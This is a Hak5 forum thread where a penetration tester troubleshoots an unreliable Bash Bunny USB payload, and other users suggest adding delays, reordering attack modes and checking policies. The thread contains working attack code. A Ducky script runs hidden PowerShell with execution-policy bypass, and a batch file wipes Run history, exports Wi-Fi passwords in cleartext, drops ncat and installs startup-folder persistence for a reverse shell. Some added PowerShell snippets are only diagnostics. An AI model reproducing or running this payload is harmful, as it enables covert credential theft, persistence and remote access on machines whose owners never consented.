Hak5 Forums
GrineUlf

Payload sometimes not working...

Hey Guys,

I have a reverse shell payload on my bash bunny, that also extracts wifi profiles. It all works, but sometimes it doesn't work. I have updated the firmware to the latest version also, and still the issue happens. Mind you, this is happening at the same test computer that I always use for testing payloads.

Every time I go on an engagement, or a colleague goes on an engagement, I make sure the bash bunny works and the payload is configured correctly. This again I did last Friday, and that is when I noticed the issue. The first time I plugged it in, the payload did not run (even though the lights changed color according to the payload script, from setup, to attack, to finish), but there was no execution of the payload (like installing the persistence file, extracting the wifi profiles). So I ran it again: pulled it out and plugged it in again. This time all the files were copied and executed. Thinking the first test was just a fluke, I removed the files copied by the payload from the target machine, and tried it again. This time nothing was copied or executed. (All tests did show the proper lights blinking according to the payload script.)

Has anyone else had this problem before? Any suggestions on why this happens?

Thanks in advance 🙂

So this is hard to troubleshoot because you are using the BB in 2 different machines. What rights does your shell require to execute? Can you run the text in a DOS/PowerShell box and get them to execute manually? What policies are set on the target device? Are there policies that may be preventing execution and/or copying files to storage? How are you getting the files to the BB? As mentioned previously, if policies prevent mass storage, this may be blocking you. What defensive items are on the device itself: AV, IDS, HIPS, network monitoring, etc.? And a final thought, if it does execute, are you trying to connect back internally or externally? There are many variables introduced in this scenario.

Hmm, maybe payload executing before drivers are installed?

I do know on new systems with the BB, if I do not have some sort of wait or check (like with network attack mode, where I wait till the target gets an IP), the BB will begin typing before it is able to type on the victim, hence the stager is never launched. That is the only time I have seen it not execute on the first try on a machine but then execute on the second try on the same machine.

This is why I normally use network delivery, so I can do a dual attack and use the network detection to let me know when the target has drivers loaded by it getting an IP. I do not know how, or if, you can do this with HID only or HID and storage. I have seen most people put a standard delay after setting the attack mode before proceeding, like 5 seconds or so.

11 hours ago, PoSHMagiC0de said:

Hmm, maybe payload executing before drivers are installed?

I agree. I've had a number of problems, originally with the USB Rubber Ducky, but also with the Bash Bunny where the drivers just aren't installed on the computer from the get-go, so sometimes plugging it in first, waiting until it is set up, then after a delay running the payload can be beneficial.

As an aside, some of the PID/VIDs for certain drivers come pre-installed on Windows, and other Operating Systems... maybe there is a way to use a pre-installed driver on Windows for example to make things work without having to set up the device each time...?

18 hours ago, korang said:

So this is hard to troubleshoot because you are using the BB in 2 different machines. What rights does your shell require to execute? Can you run the text in a DOS/PowerShell box and get them to execute manually? What policies are set on the target device? Are there policies that may be preventing execution and/or copying files to storage? How are you getting the files to the BB? As mentioned previously, if policies prevent mass storage, this may be blocking you. What defensive items are on the device itself: AV, IDS, HIPS, network monitoring, etc.? And a final thought, if it does execute, are you trying to connect back internally or externally? There are many variables introduced in this scenario.

I use the bash bunny only on one machine for the tests. Simple user rights are the only thing that is required, as the files get copied to the %USERPROFILE% directory. Other than that, it is a simple Windows 10 machine.

14 hours ago, PoSHMagiC0de said:

Hmm, maybe payload executing before drivers are installed?

I do know on new systems with the BB, if I do not have some sort of wait or check (like with network attack mode, where I wait till the target gets an IP), the BB will begin typing before it is able to type on the victim, hence the stager is never launched. That is the only time I have seen it not execute on the first try on a machine but then execute on the second try on the same machine.

This is why I normally use network delivery, so I can do a dual attack and use the network detection to let me know when the target has drivers loaded by it getting an IP. I do not know how, or if, you can do this with HID only or HID and storage. I have seen most people put a standard delay after setting the attack mode before proceeding, like 5 seconds or so.

I will definitely try the wait on it. Maybe that will solve the problem, as it does seem that sometimes it takes longer for the bash bunny to load than at other times.

2 hours ago, MB60893 said:

I agree. I've had a number of problems, originally with the USB Rubber Ducky, but also with the Bash Bunny where the drivers just aren't installed on the computer from the get-go, so sometimes plugging it in first, waiting until it is set up, then after a delay running the payload can be beneficial.

As an aside, some of the PID/VIDs for certain drivers come pre-installed on Windows, and other Operating Systems... maybe there is a way to use a pre-installed driver on Windows for example to make things work without having to set up the device each time...?

If the delay is not enough, I will also try the PID/VIDs, as they currently are set to the default. Also I notice that the bash bunny is seen as a Network device, even though I am using HID STORAGE as the attack mode. Could this be a reason for the problem as well? As in perhaps loading the wrong drivers for the desired attack mode?

HID networking can definitely cause problems. Check the attackmode is being set properly, and it isn't showing up as an ECM_Ethernet adapter or whatever.

Standard keyboards and flash storage are your best bet.

2 hours ago, MB60893 said:

HID networking can definitely cause problems. Check the attackmode is being set properly, and it isn't showing up as an ECM_Ethernet adapter or whatever.

Standard keyboards and flash storage are your best bet.

Here is the payload code; as you can see, the attack mode is set to HID and STORAGE. Yet Windows sees the device for some reason as an Ethernet device.

DUCKY_LANG='dk'

LED SETUP
 
ATTACKMODE HID STORAGE
 
GET SWITCH_POSITION
 
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
 
LED ATTACK
 
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\e.bat')"
 
LED FINISH 

I'm not sure exactly what the win7-win8-cdc-acm.inf file does, but just for certainty, here are the contents.

; Windows USB CDC ACM Setup File

; Based on INF template which was:
;     Copyright (c) 2000 Microsoft Corporation
;     Copyright (c) 2007 Microchip Technology Inc.
; likely to be covered by the MLPL as found at:
;    <http://msdn.microsoft.com/en-us/cc300389.aspx#MLPL>.
; For use only on Windows operating systems.

[Version]
Signature="$Windows NT$"
Class=Ports
ClassGuid={4D36E978-E325-11CE-BFC1-08002BE10318}
Provider=%Linux%
DriverVer=11/15/2007,5.1.2600.0

[Manufacturer]
%Linux%=DeviceList, NTamd64

[DestinationDirs]
DefaultDestDir=12


;------------------------------------------------------------------------------
;  Windows 2000/XP/Vista-32bit Sections
;------------------------------------------------------------------------------

[DriverInstall.nt]
include=mdmcpq.inf
CopyFiles=DriverCopyFiles.nt
AddReg=DriverInstall.nt.AddReg

[DriverCopyFiles.nt]
usbser.sys,,,0x20

[DriverInstall.nt.AddReg]
HKR,,DevLoader,,*ntkern
HKR,,NTMPDriver,,USBSER.sys
HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

[DriverInstall.nt.Services]
AddService=usbser, 0x00000002, DriverService.nt

[DriverService.nt]
DisplayName=%SERVICE%
ServiceType=1
StartType=3
ErrorControl=1
ServiceBinary=%12%\USBSER.sys

;------------------------------------------------------------------------------
;  Vista-64bit Sections
;------------------------------------------------------------------------------

[DriverInstall.NTamd64]
include=mdmcpq.inf
CopyFiles=DriverCopyFiles.NTamd64
AddReg=DriverInstall.NTamd64.AddReg

[DriverCopyFiles.NTamd64]
USBSER.sys,,,0x20

[DriverInstall.NTamd64.AddReg]
HKR,,DevLoader,,*ntkern
HKR,,NTMPDriver,,USBSER.sys
HKR,,EnumPropPages32,,"MsPorts.dll,SerialPortPropPageProvider"

[DriverInstall.NTamd64.Services]
AddService=usbser, 0x00000002, DriverService.NTamd64

[DriverService.NTamd64]
DisplayName=%SERVICE%
ServiceType=1
StartType=3
ErrorControl=1
ServiceBinary=%12%\USBSER.sys


;------------------------------------------------------------------------------
;  Vendor and Product ID Definitions
;------------------------------------------------------------------------------
; When developing your USB device, the VID and PID used in the PC side
; application program and the firmware on the microcontroller must match.
; Modify the below line to use your VID and PID.  Use the format as shown
; below.
; Note: One INF file can be used for multiple devices with different
;       VID and PIDs.  For each supported device, append
;       ",USB\VID_xxxx&PID_yyyy" to the end of the line.
;------------------------------------------------------------------------------
[SourceDisksFiles]
[SourceDisksNames]
[DeviceList]
%DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00

[DeviceList.NTamd64]
%DESCRIPTION%=DriverInstall, USB\VID_F000&PID_FF02, USB\VID_F000&PID_FF02&MI_00


;------------------------------------------------------------------------------
;  String Definitions
;------------------------------------------------------------------------------
;Modify these strings to customize your device
;------------------------------------------------------------------------------
[Strings]
Linux               = "Linux Developer Community"
DESCRIPTION         = "Gadget Serial"
SERVICE             = "USB RS-232 Emulation Driver"

And last, but not least, the actual batch file contents:

@echo off
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
set files=%~dp0\
set destnc=C:\temp\
set destp=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
set tm=%date:~-4,4%%date:~-10,2%%date:~-7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

set tm=%tm: =%
set wifi=%~d0\loot\%COMPUTERNAME%_%tm%\wifi_profiles
mkdir %wifi% >>nul
netsh wlan export profile key=clear folder=%wifi%

robocopy "%files% " "%destnc% " "ncat.exe"
robocopy "%files% " "%destp% " "persistence.vbs"

C: 
cd %destp%

cmd /c "persistence.vbs"
exit

Although I doubt the problem actually lies with the payload itself, as sometimes it does work, and sometimes it does not. As in, sometimes it does copy the files, and start the reverse connection, and sometimes it just doesn't.

Thanks for the help so far all 🙂
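The check MB60893 suggested above (that the device is really enumerating as keyboard plus mass storage and not also as an ECM Ethernet adapter or a serial port) can be done on the Windows host itself rather than guessed from the payload. The following PowerShell is an added example; it is not code from this thread or from Hak5. It assumes the PnpDevice cmdlets (Windows 8.1 / Windows 10 and later) and uses VID F000, taken from the INF posted above, as its default vendor id; the function name is my own.

```powershell
# Added example (not from the thread or from Hak5): list every present PnP
# device under one USB vendor id, grouped by device class, so a device that
# should be HID + storage can be checked for an extra network or serial
# function. Assumes the PnpDevice module (Windows 8.1 / 10 and later).
function Get-UsbDeviceFunctions {
    param(
        # Default taken from the INF posted in the thread (VID_F000); an
        # assumption, pass the vendor id of the device you are looking at.
        [string]$VendorId = 'F000'
    )

    $devices = Get-PnpDevice -PresentOnly -ErrorAction Stop |
        Where-Object { $_.InstanceId -like "USB\VID_$VendorId*" }

    if (-not $devices) {
        Write-Warning "No present USB device with VID_$VendorId"
        return
    }

    # One row per enumerated function. Class is e.g. HIDClass or Keyboard for
    # the keyboard, USB / DiskDrive for mass storage, Net for an ECM/RNDIS
    # adapter, Ports for a CDC ACM serial port.
    $devices |
        Select-Object Class, FriendlyName, Status, InstanceId |
        Sort-Object Class, InstanceId

    $classes = @($devices.Class | Sort-Object -Unique)
    if ($classes -contains 'Net') {
        # The symptom described in the thread: a network adapter present
        # although the intended attack mode was HID STORAGE.
        Write-Warning "VID_$VendorId exposes a network adapter; classes seen: $($classes -join ', ')"
    }
    if ($classes -contains 'Ports') {
        Write-Warning "VID_$VendorId exposes a serial (CDC ACM) port; classes seen: $($classes -join ', ')"
    }
}

Get-UsbDeviceFunctions | Format-Table -AutoSize
```

Run it with the device plugged in and the payload already past its ATTACKMODE line; if a Net or Ports row shows up for a payload that asked for HID STORAGE only, the attack mode was not applied the way you expected, which is exactly the situation the thread is chasing.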

OK, so I would try running the files separately on the machine without the bash bunny. If that works, then a few things could be wrong with it.

1. The bunny needs a USB power source that can supply at least 5V at 1.5A, as per https://wiki.bashbunny.com/#!index.md.

2. Sometimes switching ATTACKMODE HID STORAGE to read ATTACKMODE STORAGE HID can fix things, or vice versa. I think there may be a few problems with how the devices are emulated based on the sequence each thing is set up in.

3. I notice you have the Ducky Language set to "dk", (Danish...?) maybe try a different language with similar keyboard configurations, or even go straight for a US keyboard layout. That may make a difference.

4. There are some cases where machines can actually have VBScripts and Command Line Batch Files disabled through registry settings. I doubt that would be the case here, but it is something to consider.

5. I am unfamiliar with the following line expressed in your code above:

RUN WIN Powershell -nop -ex Bypass -w Hidden 

I get the basic premise behind this, but surely, just using "Q GUI R" followed by a slight delay, then "Q STRING <Powershell line here>", then "Quack ENTER" would also do the job...?

6. You'll also want to ensure this script is indeed running as an Administrator, otherwise a good selection of the commands won't work. The command "reg" and creating/moving things to the root of the C Drive can also cause problems, even if you have a folder called "temp" under the path "C:\Temp", this can also be protected and require administrator privileges to perform read/write commands to this directory. Same story with NETSH, and that can also have a different name from "WLAN" from recollection as well, whether it be "Wi-Fi" or "Wireless Local Area Network Connection" or something else... I don't know if these are particularly relevant to your problem, but they are all things to consider.

Don't worry too much about the win7-win8-cdc-acm.inf file. It looks like it's needed for setting drivers correctly.

Hope these help diagnose your problems!

-M.

Edited by MB60893
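MB60893's point 4 (VBScript and batch files disabled through registry settings) is something that can be audited on the host rather than guessed at. The PowerShell below is an added example and not code from this thread or from Hak5: it reads the two documented policy values that actually block .vbs and .bat execution on a Windows host and reports them, and shows the machine-level PowerShell execution policy for context. It is read-only and needs no elevation; the function name is my own.

```powershell
# Added example (not from the thread or from Hak5): report the Windows policy
# settings that block VBScript and batch-file execution, the ones MB60893's
# point 4 refers to. Read-only; no elevation needed.
function Get-ScriptHostPolicyState {
    $state = [ordered]@{}

    # Windows Script Host: a DWORD 'Enabled' = 0 under either hive makes
    # wscript/cscript refuse to run .vbs/.js files; an absent value means allowed.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Microsoft\Windows Script Host\Settings"
        $enabled = (Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue).Enabled
        $state["WSH ($hive)"] =
            if ($null -eq $enabled) { 'not set (allowed)' }
            elseif ($enabled -eq 0) { 'DISABLED' }
            else { 'allowed' }
    }

    # "Prevent access to the command prompt" policy (DisableCMD):
    # 1 = block cmd.exe and batch files, 2 = block interactive cmd only.
    $cmdKey = 'HKCU:\Software\Policies\Microsoft\Windows\System'
    $disableCmd = (Get-ItemProperty -Path $cmdKey -Name DisableCMD -ErrorAction SilentlyContinue).DisableCMD
    $state['cmd / batch files'] =
        if ($null -eq $disableCmd) { 'not set (allowed)' }
        elseif ($disableCmd -eq 1) { 'cmd and batch files DISABLED' }
        elseif ($disableCmd -eq 2) { 'interactive cmd disabled, batch files allowed' }
        else { "unexpected value $disableCmd" }

    # For context only: the execution policy governs .ps1 files, and a command
    # line that passes -ExecutionPolicy Bypass (as the posted payload does)
    # overrides it, so it is not a control against that kind of launch.
    $state['PowerShell execution policy (LocalMachine)'] = Get-ExecutionPolicy -Scope LocalMachine

    [pscustomobject]$state
}

Get-ScriptHostPolicyState | Format-List
```

On a host where both WSH values are unset and DisableCMD is unset, the .vbs and .bat stages of a payload like the one posted will run with ordinary user rights, which matches what the thread's author reports; a DISABLED line explains a silent failure that has nothing to do with driver timing.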

On 6/13/2018 at 12:41 PM, MB60893 said:

OK, so I would try running the files separately on the machine without the bash bunny. If that works, then a few things could be wrong with it.

1. The bunny needs a USB power source that can supply at least 5V at 1.5A, as per https://wiki.bashbunny.com/#!index.md.

2. Sometimes switching ATTACKMODE HID STORAGE to read ATTACKMODE STORAGE HID can fix things, or vice versa. I think there may be a few problems with how the devices are emulated based on the sequence each thing is set up in.

3. I notice you have the Ducky Language set to "dk", (Danish...?) maybe try a different language with similar keyboard configurations, or even go straight for a US keyboard layout. That may make a difference.

4. There are some cases where machines can actually have VBScripts and Command Line Batch Files disabled through registry settings. I doubt that would be the case here, but it is something to consider.

5. I am unfamiliar with the following line expressed in your code above:


RUN WIN Powershell -nop -ex Bypass -w Hidden 

I get the basic premise behind this, but surely, just using "Q GUI R" followed by a slight delay, then "Q STRING <Powershell line here>", then "Quack ENTER" would also do the job...?

6. You'll also want to ensure this script is indeed running as an Administrator, otherwise a good selection of the commands won't work. The command "reg" and creating/moving things to the root of the C Drive can also cause problems, even if you have a folder called "temp" under the path "C:\Temp", this can also be protected and require administrator privileges to perform read/write commands to this directory. Same story with NETSH, and that can also have a different name from "WLAN" from recollection as well, whether it be "Wi-Fi" or "Wireless Local Area Network Connection" or something else... I don't know if these are particularly relevant to your problem, but they are all things to consider.

Don't worry too much about the win7-win8-cdc-acm.inf file. It looks like it's needed for setting drivers correctly.

Hope these help diagnose your problems!

-M.

Update from my side, switching the attackmode from hid storage to storage hid, and adding the delay worked! Also I changed the load point of the temp folder, which is now in %USERPROFILE%/temp which works amazingly. I tried the Q GUI R, but for some reason that didn't work, so I stayed with the RUN WIN as pointed out in the bash bunny manual.

It is true about the command line and VBScripts possibly being disabled on some machines through policies (I had that with a few engagements in the past), but that is just a risk that I need to take.

But at least it works now 🙂 Thanks all for the input!